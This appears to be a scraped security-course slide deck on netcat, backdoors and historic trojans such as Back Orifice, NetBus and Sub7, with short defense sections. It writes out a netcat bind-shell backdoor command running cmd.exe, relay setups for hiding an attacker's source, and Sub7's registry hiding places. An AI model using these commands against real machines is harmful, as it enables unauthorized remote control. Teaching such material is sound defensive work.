Backdoors and Trojans

Yüklə 459 b.
ölçüsü459 b.

Backdoors and Trojans

Agenda Overview

  • Netcat

  • Trojans/Backdoors

Agenda Netcat

  • Netcat

  • Netcat Defenses

  • Summary

Netcat – TCP/IP Swiss Army Knife

  • Reads and Writes data across the network using TCP/UDP connections

  • Feature-rich network debugging and exploration tool

  • Part of the Red Hat Power Tools collection and comes standard on SuSE Linux, Debian Linux, NetBSD and OpenBSD distributions.

  • UNIX and Windows versions available at:



  • Designed to be a reliable “back-end” tool – to be used directly or easily driven by other programs/scripts

  • Very powerful in combination with scripting languages (eg. Perl)

  • “If you were on a desert island, Netcat would be your tool of choice!”

  • - Ed Skoudis

Netcat – Major Features

  • Outbound or inbound connections

  • TCP or UDP, to or from any ports

  • Full DNS forward/reverse checking, with appropriate warnings

  • Ability to use any local source port

  • Ability to use any locally-configured network source address

  • Built-in port-scanning capabilities, with randomizer

Netcat – Major Features (contd)

  • Built-in loose source-routing capability

  • Can read command line arguments from standard input

  • Slow-send mode, one line every N seconds

  • Hex dump of transmitted and received data

  • Optional ability to let another program service established connections

  • Optional telnet-options responder

Netcat (called ‘nc’)

  • Can run in client/server mode

  • Default mode – client

  • Same executable for both modes

  • client mode

    • nc [dest] [port_no_to_connect_to]
  • listen mode (-l option)

    • nc –l –p [port_no_to_connect_to]

Netcat – Client mode

  • Computer with netcat in Client mode

  • Input comes from a standard Input device

  • Passes through netcat in client mode

  • Output is sent across the network to any TCP/UDP port on any system

Netcat - listen mode

  • Computer with netcat in listen mode

  • Input comes from the network on any TCP/UDP port

  • Passes through netcat in listen mode

  • Output appears on standard output device

Netcat - Configuration

  • LINUX installation

    • tar xvfs netcat.tar.gz
    • cd netcat
    • make linux
    • cp nc /usr/local/sbin
    • Note: The last command will allow you to run netcat
    • without having to specify the directory

Netcat - Installation

  • Windows Installation

    • Copy file in a folder
    • Unzip this file – creates a directory called nc11nt
    • To run netcat – go to the nc11nt folder and run it from there

Netcat – Possible uses

  • Transfer files

  • Scan ports

  • Create backdoors

  • Create relays

  • Many more…

Netcat – File transfer

  • Scenario: Attacker wants to transfer a file to

  • another machine, only one port open and that is

  • not FTP port

  • Windows – nc listener (IP: a.b.c.d)

  • c:\ nc –l –p 1234 > testfile.txt

  • Linux – nc client (IP: a.b.c.d)

  • nc a.b.c.d 1234 < testfile.txt

Netcat – Scan ports

  • Goal: To scan ports without using nmap

  • Send H-E-L-L-O to each target

  • On the client machine

  • echo Hello | nc –v –w 3 –z a.b.c.d 1-200

  • This will go to various TCP or UDP ports on the target machine

Netcat – Create backdoors

  • On Windows machine, create netcat backdoor listener that runs cmd.exe shell

    • c:\ nc –l –p 7777 –e cmd.exe
  • Connect to this backdoor by running netcat in client mode on Linux machine

    • nc a.b.c.d 7777
  • Can send commands like “cd” and “mkdir”

Netcat – Create relays

  • Can be used to bounce connections between systems.

  • Obscures attacker’s source

  • Create a relay on the Linux machine

  • Configure the relay to forward data to another port on the linux machine

  • At the other port, set up a netcat backdoor shell

  • Connect to the relay from the Windows machine using netcat in client mode

Netcat Defenses

  • For file transfer and port scanning – Close all unused ports

  • For backdoors

    • Close unused ports
    • Carefully audit system usage
      • Check applications running with root privileges
      • Close suspicious programs
  • For relays – Multiple layers of security

Summary Netcat

  • Netcat

    • Overview
    • Major Features
    • Installation and Configuration
    • Possible Uses
  • Netcat Defenses

  • Next – Trojans/Backdoors

Agenda Trojans/Backdoors

  • Malicious Remote Access Tools

    • Backdoors
    • Trojans
  • Defenses against Trojans/Backdoors

  • Virtual Network Channels

  • Summary

Malicious Remote Access Tools

  • Backdoors

    • Also called as “trapdoor”
    • An undocumented way of gaining access to a program, online service or an entire computer system.
    • Allows to execute privileged operations on the affected machine
  • Trojan Horse

    • Does not replicate or copy itself
    • Damages or compromises the security of the computer
    • It relies on someone emailing it to you. It does not email itself

Back Orifice

  • Authored by Cult of the Dead Cow

  • Released on 3rd Aug 1998

  • Allows remote manipulation of

    • File system
    • Registry
    • System
    • Passwords
    • Network
    • Processes

Back Orifice (cont.)

  • First widely used trojan

    • Complete Implementation of services supported by the Windows 95/98 API
    • Small, freely available
    • Attached to innocent binary
  • Detection

    • Encrypted UDP (port 31337)
    • XOR packets with random stream + password
    • Optional TCP file transfer


  • Officially distributed by SpectorSoft (

  • eBlaster

    • Records information and emails it
    • All websites visited, applications run, keystrokes typed, chat conversations, instant messages
  • Spector

    • Like a “camera”
    • Records everything being done on the computer, takes several screen shots which can be played back as a movie


  • The author of NetBus says, "NetBus was made to let people have some fun with his/her friends."

  • He also says, "I hope NetBus (and similar programs like Back Orifice) will make more people aware of the security risks at their system."

  • Unfortunately, NetBus allows far more access than a mere prank should ever require


  • It allows anyone running the client portion to connect and control anyone running the server portion of it, with the same rights and privileges as the currently logged on user.


  • Features

    • Does everything Back Orifice can do & more
    • Tricks with the CD (open, close on command or timed intervals
    • Mouse control (can swap functions of the left and right buttons)
    • Send Interactive dialogues to communicate with the compromised machine


  • One of the most popular and powerful trojan horses around

  • Originally known as Backdoor G

  • Has been revised many times in the past

  • Known for its ease of use and flexible settings


  • A partial list of what Sub7 can do

    • Monitor all online activity
    • Manipulate any file on the machine
    • Edit the registry
    • Host FTP servers
    • Record passwords and keystrokes
    • Watch you (if you have a webcam) and much more…


  • Used to escape virus detection, since it morphs itself, every time it is sent to a new victim

  • How it loads, where it hides

    • It can hide in any directory and can load from the registry and a few other less known places
    • It can be assigned a different file name each time it runs, so every time the machine is rebooted, the file is altered in some way
    • Harder to track down and delete


  • It usually hides in the following location


  • CurrenVersion\Run

  • or


  • CurrentVersion\RunServices

  • or

  • HKEY_CLASSES_ROOT\*\shellex


  • If it is placed in the shellex part of the registry, even if the infected file is removed, the computer will not function properly

  • For e.g.

  • c:\windows\sub7.exe /notepad.exe

  • Removing sub7.exe will stop normal execution of notepad.exe also

Sub7 Screenshot #1

Sub7 Screenshot #2

Sub7 Screenshot #3

Sub7 Screenshot #4

How attackers find an infected PC

  • Some trojans report the IP address on an IRC channel

  • Port scanners

    • Used to find PCs which has “the backdoor open”
  • Customized access – Password protected

Defense against Trojans/Backdoors

  • Scan attachments properly (most common way of infecting machines)

  • Anti-virus checks

  • Firewalls

  • Remove suspicious programs/processes

Virtual Network Connections

  • Application level backdoor

  • Can control for example a Windows machine from a Linux machine using VNC

    • Install VNC
    • Run the VNC server on the Windows machine
    • Use Linux VNC viewer to access the server on Windows machine

Virtual Network Connections

  • Controlling a Linux machine from Windows

    • Run VNC server on Linux
    • Use VNC viewer from Windows to access the Linux machine
    • Note: Reconfigure the firewall on a linux machine
    • to accept packets for the VNC port (TCP port 5901)


  • Trojans

  • Backdoors

  • Defenses against Trojans/Backdoors

  • Virtual Network Connections

Yüklə 459 b.

Dostları ilə paylaş:

Verilənlər bazası müəlliflik hüququ ilə müdafiə olunur © 2024
rəhbərliyinə müraciət

    Ana səhifə